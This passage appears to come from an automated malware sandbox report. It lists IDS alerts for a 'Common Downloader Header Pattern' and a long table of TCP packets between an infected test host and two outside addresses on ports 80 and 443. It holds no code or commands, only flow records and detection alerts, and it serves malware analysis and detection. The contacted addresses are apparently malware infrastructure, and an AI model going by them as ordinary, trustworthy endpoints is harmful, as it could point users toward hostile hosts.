2024-12-05T18:51:24.831550+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49741	104.21.67.152	443	TCP
2024-12-05T18:51:28.140597+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49753	104.21.67.152	443	TCP
2024-12-05T18:51:28.152616+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49752	104.21.67.152	443	TCP
2024-12-05T18:51:37.951473+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49788	104.21.67.152	443	TCP
2024-12-05T18:51:44.852421+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49809	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 18:51:08.899439096 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:09.019172907 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:09.019253969 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:09.019576073 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:09.141614914 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:10.439364910 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:10.477319002 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:10.597183943 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:10.970990896 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:11.090059042 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:11.160588980 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:11.160630941 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:11.161067009 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:11.174510956 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:11.174532890 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.396188021 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.396275043 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.418554068 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.418571949 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.418883085 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.480671883 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.526648998 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.567328930 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.889991045 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.890053988 CET	443	49705	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:12.890093088 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.937129021 CET	49705	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:12.941401958 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:13.061678886 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:13.429111958 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:13.435543060 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:13.435590982 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:13.435672045 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:13.436217070 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:13.436248064 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:13.480698109 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:14.658232927 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:14.664784908 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:14.664802074 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:15.131583929 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:15.131659031 CET	443	49707	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:15.131774902 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:15.132452965 CET	49707	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:15.136081934 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.137603998 CET	49708	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.256299019 CET	80	49703	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:15.256453991 CET	49703	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.257316113 CET	80	49708	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:15.257446051 CET	49708	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.257900000 CET	49708	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.378133059 CET	80	49708	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:15.536215067 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.656105042 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:15.656625032 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.671380997 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:15.791208029 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:16.668380976 CET	80	49708	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:16.671041012 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:16.671076059 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:16.671149969 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:16.671884060 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:16.671905994 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:16.715089083 CET	49708	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:17.071607113 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:17.079340935 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:17.199477911 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:17.656429052 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:17.699485064 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:17.718137026 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:17.718185902 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:17.718255043 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:17.723339081 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:17.723360062 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:17.899049997 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:17.901316881 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:17.901352882 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.372411966 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.372482061 CET	443	49715	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.372528076 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:18.373765945 CET	49715	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:18.380352020 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:18.500432014 CET	80	49722	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:18.500523090 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:18.500711918 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:18.620589018 CET	80	49722	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:18.953171968 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.953264952 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:18.955176115 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:18.955183983 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.955491066 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:18.996326923 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.014005899 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.055321932 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.409761906 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.409847975 CET	443	49716	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.409894943 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.414271116 CET	49716	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.417980909 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:19.543492079 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:19.903251886 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:19.905538082 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.905571938 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.905654907 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.905977011 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.905986071 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.918057919 CET	80	49722	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:19.919706106 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.919733047 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.919791937 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.920053005 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:19.920068979 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:19.949508905 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:19.965101004 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.127191067 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.128999949 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.129029989 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.135510921 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.137129068 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.137170076 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.581414938 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.581487894 CET	443	49724	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.581603050 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.582259893 CET	49724	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.586273909 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.587610960 CET	49732	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.610219955 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.610287905 CET	443	49730	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:21.610466003 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.610853910 CET	49730	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:21.614847898 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.615873098 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.706485033 CET	80	49714	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:21.706623077 CET	49714	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.707828999 CET	80	49732	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:21.707926035 CET	49732	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.708097935 CET	49732	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.734946966 CET	80	49722	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:21.735050917 CET	49722	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.735601902 CET	80	49733	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:21.735713959 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.735888004 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:21.827820063 CET	80	49732	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:21.855719090 CET	80	49733	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:23.120934010 CET	80	49732	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:23.122507095 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.122549057 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:23.122752905 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.123053074 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.123066902 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:23.136339903 CET	80	49733	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:23.137929916 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.137981892 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:23.138096094 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.138382912 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:23.138398886 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:23.168230057 CET	49732	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:23.183845043 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.358978033 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.359236002 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.361098051 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.361145020 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.365467072 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.365490913 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.827280045 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.827356100 CET	443	49742	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.827402115 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.827941895 CET	49742	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.831422091 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.831615925 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.831680059 CET	443	49741	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:24.831736088 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.832168102 CET	49741	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:24.832976103 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.836189032 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.952124119 CET	80	49733	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:24.952183962 CET	49733	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.953253031 CET	80	49749	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:24.953330040 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.953478098 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.955945015 CET	80	49750	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:24.956068039 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:24.956271887 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:25.073394060 CET	80	49749	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:25.075925112 CET	80	49750	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:26.362000942 CET	80	49750	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:26.367177010 CET	80	49749	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:26.367270947 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.367326021 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:26.367389917 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.374227047 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.374281883 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:26.374353886 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.418261051 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:26.418262959 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:26.427428961 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.427469015 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:26.428582907 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:26.428611040 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:27.684545040 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:27.688437939 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:27.707767010 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:27.707803011 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:27.707906961 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:27.707940102 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:28.140607119 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:28.140683889 CET	443	49753	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:28.140810966 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:28.141468048 CET	49753	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:28.145183086 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.146409988 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.152645111 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:28.152709961 CET	443	49752	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:28.152822971 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:28.153382063 CET	49752	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:28.156827927 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.157821894 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.267323017 CET	80	49749	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:28.267400026 CET	49749	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.268095970 CET	80	49758	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:28.268172979 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.268332005 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.279109955 CET	80	49750	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:28.279182911 CET	49750	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.279795885 CET	80	49759	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:28.279912949 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.280100107 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:28.390985966 CET	80	49758	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:28.404274940 CET	80	49759	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:29.738684893 CET	80	49758	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:29.746748924 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.746807098 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:29.746887922 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.747225046 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.747243881 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:29.793256044 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:29.852705002 CET	80	49759	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:29.854480028 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.854527950 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:29.854645967 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.855000973 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:29.855020046 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:29.902652025 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:30.966681004 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:30.969290018 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:30.969331026 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.072983980 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.075006008 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:31.075031042 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.440551043 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.440618038 CET	443	49765	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.440727949 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:31.441257954 CET	49765	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:31.444717884 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.445779085 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.530810118 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.530889988 CET	443	49766	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:31.530951977 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:31.532499075 CET	49766	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:31.536571980 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.537296057 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.565434933 CET	80	49758	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:31.565535069 CET	49758	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.566317081 CET	80	49772	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:31.566402912 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.566623926 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.659866095 CET	80	49773	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:31.660020113 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.660101891 CET	80	49759	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:31.660152912 CET	49759	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.660171032 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:31.688839912 CET	80	49772	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:31.779989958 CET	80	49773	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:32.983830929 CET	80	49772	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:32.985470057 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:32.985522985 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:32.985625029 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:32.985886097 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:32.985903025 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:33.027815104 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:33.077064991 CET	80	49773	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:33.078504086 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:33.078558922 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:33.078670025 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:33.078953028 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:33.078967094 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:33.121593952 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.215790987 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.217761040 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.217832088 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.311893940 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.321181059 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.321216106 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.675859928 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.675936937 CET	443	49775	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.676105022 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.676639080 CET	49775	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.680212021 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.681411028 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.762980938 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.763051033 CET	443	49776	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:34.763139009 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.763758898 CET	49776	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:34.767287016 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.768501043 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.800678968 CET	80	49772	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:34.800812960 CET	49772	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.801373959 CET	80	49781	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:34.801456928 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.801732063 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.887770891 CET	80	49773	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:34.887845993 CET	49773	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.888216019 CET	80	49782	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:34.888294935 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.888676882 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:34.921631098 CET	80	49781	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:35.008692026 CET	80	49782	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:36.251034975 CET	80	49781	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:36.252573967 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.252641916 CET	443	49788	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:36.252722025 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.253031969 CET	49788	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.253046036 CET	443	49788	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:36.293298960 CET	49781	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:36.586668015 CET	80	49782	132.226.8.169	192.168.2.7
Dec 5, 2024 18:51:36.588126898 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.588165998 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:36.588246107 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.588510036 CET	49789	443	192.168.2.7	104.21.67.152
Dec 5, 2024 18:51:36.588524103 CET	443	49789	104.21.67.152	192.168.2.7
Dec 5, 2024 18:51:36.637073994 CET	49782	80	192.168.2.7	132.226.8.169
Dec 5, 2024 18:51:37.486437082 CET	443	49788	104.21.67.152	192.168.2.7
